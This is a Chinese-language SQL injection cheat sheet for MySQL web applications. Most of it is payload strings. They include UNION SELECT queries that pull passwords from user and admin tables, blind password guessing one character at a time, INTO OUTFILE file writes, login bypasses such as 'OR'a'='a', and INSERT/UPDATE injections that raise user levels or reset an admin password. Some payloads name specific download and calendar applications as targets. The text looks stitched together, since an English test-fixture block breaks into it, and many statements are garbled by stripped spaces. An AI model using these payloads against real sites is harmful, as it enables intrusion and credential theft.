'%23 'andpassWord='mypass id=-1unionselect1,1,1 id=-1unionselectchar(97),char(97),char(97) id=1unionselect1,1frommembers id=1unionselect1,1fromadmin id=1unionselect1,1fromuser userid=1andpassword=mypass userid=1andmid(password,3,1)=char(112) userid=1andmid(password,4,1)=char(97) andord(mid(password,1))>111(ord函数很好用,可以返回整形的) 'andLENGTH(password)='6(探测密码长度) 'andLEFT(password,1)='m 'andLEFT(password,2)='my …………………………依次类推 'unionselect1,username,passwordfromuser/ 'unionselect1,passwordfromuser/ ='unionselect1,passwordfromuser/(可以是1或者=后直接跟) 99999'unionselect1,passwordfromuser/ 'intooutfile'c:/file.txt(导出文件) ='or1=1intooutfile'c:/file.txt 1'unionselect1,passwordfromuserintooutfile'c:/user.txt selectpasswordFROMadminswherelogin='John'INTODUMPFILE'/path/to/site/file.txt' id='unionselect1,passwordfromuserintooutfile id=-1unionselect1,database(),version()(灵活应用查询) 常用查询测试语句, selectFROMtablewhere1=1 selectFROMtablewhere'uuu'='uuu' selectFROMtablewhere1<>2 selectFROMtablewhere3>2 selectFROMtablewhere2<3 selectFROMtablewhere1 selectFROMtablewhere1+1 selectFROMtablewhere1--1 selectFROMtablewhereISNULL(NULL) selectFROMtablewhereISNULL(COT(0)) selectFROMtablewhere1ISNOTNULL selectFROMtablewhereNULLISNULL selectFROMtablewhere2BETWEEN1AND3 selectFROMtablewhere'b'BETWEEN'a'AND'c' selectFROMtablewhere2IN(0,2) selectFROMtablewhereCASEWHEN1>0THEN1END 例如:夜猫下载系统1.0版本 id=1unionselect1,1 unionselect1,1fromymdown_user unionselect1,1fromymdown_userwhereid=1 id=10000unionselect1,1fromymdown_userwhereid=1andgroupid=1 unionselect1,password,1fromymdown_userwhereid=1(替换,寻找密码) unionselect1,1fromymdown_userwhereid=1andord(mid(password,1))=49(验证第一位密码) unionselect1,2,1))=50(第二位) unionselect1,1))=51 ………………………………………………………… 例如2:灰色轨迹变换id进行测试(meteor) union%20(select%20allowsmilies,public,userid,'0000-0-0',user(),version()%20FROM%20calendar_events%20where%20eventid%20=%2013)%20order%20by%20eventdate 
union%20(select%20allowsmilies,pass(),version()%20FROM%20calendar_events%20where%20eventid%20=%2010)%20order%20by%20eventdate 构造语句: selectallowsmilies,eventdate,event,subjectFROMcalendar_eventswhereeventid=1union(select1,1fromuserwhereuserid=1) selectallowsmilies,passwordfromuserwhereuserid=1) union%20(select%201,'1999-01-01','a',password%20FROM%20user%20where%20userid%20=%205)%20order%20by%20eventdate union%20(select%201,12695,password%20FROM%20user%20where%20userid=13465)%20order%20by%20eventdate union%20(select%201,userid%20FROM%20user%20where%20username='sandflee')%20order%20by%20eventdate(查沙子的id) (selectaFROMtable_namewherea=10ANDB=1ORDERBYaLIMIT10) selectFROMarticlewherearticleid='$id'unionselectFROM……(字段和数据库相同情况下,可直接提交) selectFROMarticlewherearticleid='$id'unionselect1,1FROM……(不同的情况下) 特殊技巧:在表单,搜索引擎等地方写: "_" "." "% %'ORDERBYarticleid/ %'ORDERBYarticleid# 'ORDERBYarticleid/* 'ORDERBYarticleid# $command="dirc:\";system($command); selectFROMarticlewherearticleid='$id' selectFROMarticlewherearticleid=$id 1'and1=2unionselectfromuserwhereuserid=1/句中变为 (selectFROMarticlewherearticleid='1'and1=2unionselectfromuserwhereuserid=1/') 1and1=2unionselectfromuserwhereuserid=1 语句形式:建立一个库,插入: createDATABASEinjection
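-- Test fixture for the injection walk-through: a three-column `user` table.
-- NOTE(review): `password` is a plaintext VARCHAR(20); a production schema would
-- hold a salted hash, never a recoverable password, and would not cap it at 20.
CREATE TABLE user (
    userid   INT(11)     NOT NULL AUTO_INCREMENT,
    username VARCHAR(20) NOT NULL DEFAULT '',
    password VARCHAR(20) NOT NULL DEFAULT '',
    PRIMARY KEY (userid)
);
-- Seed row. Explicit column list so the statement keeps working if columns are added.
INSERT INTO user (userid, username, password)
VALUES (1, 'swap', 'mypass');
插入一个注册用户: insertINTOuser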
(userid,homepage,userlevel)VALUES('','$username','$password','$homepage','1'); "insertINTOmembres(login,nom,email,userlevel)VALUES('$login','$pass','$nom','$email','1')"; insertINTOmembres(login,'','3')#','1') "insertINTOmembresSETlogin='$login',password='$pass',nom='$nom',email='$email'"; insertINTOmembresSETlogin='',password='',nom='',userlevel='3',email='' "insertINTOmembresVALUES('$id','$login','1')"; updateuserSETpassword='$password',homepage='$homepage'whereid='$id' updateuserSETpassword='MD5(mypass)'whereusername='admin'#)',homepage='$homepage'whereid='$id' "updatemembresSETpassword='$pass',email='$email'whereid='$id'"; updatemembresSETpassword='[PASS]',email=''whereid='[ID]' "updatenewsSETVotes=Votes+1,score=score+$notewhereidnews='$id'"; 长用函数: DATABASE() USER() SYSTEM_USER() SESSION_USER() CURRENT_USER() 比如: updatearticleSETtitle=$titlewherearticleid=1对应函数 updatearticleSETtitle=DATABASE()whereid=1 #把当前数据库名更新到title字段 updatearticleSETtitle=USER()whereid=1 #把当前MysqL用户名更新到title字段 updatearticleSETtitle=SYSTEM_USER()whereid=1 #把当前MysqL用户名更新到title字段 updatearticleSETtitle=SESSION_USER()whereid=1 #把当前MysqL用户名更新到title字段 updatearticleSETtitle=CURRENT_USER()whereid=1 #把当前会话被验证匹配的用户名更新到title字段 ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: $req="selectFROMmembreswherenamelike'%$search%'ORDERBYname"; selectFROMmembreswherenamelike'%%'ORDERBYuid#%'ORDERBYname selectFROMmembreswherenamelike'%%'ORDERBYuid#%'ORDERBYname selectuidFROMadminswherelogin=''OR'a'='a'ANDpassword=''OR'a'='a'(经典) selectuidFROMadminswherelogin=''ORadmin_level=1#'ANDpassword='' selectFROMtablewheremsglike'%hop' selectuidFROMmembreswherelogin='Bob'ANDpasswordlike'a%'#'ANDpassword='' select*FROMmembreswherenamelike'%%'ORDERBYuid#%'ORDERBYname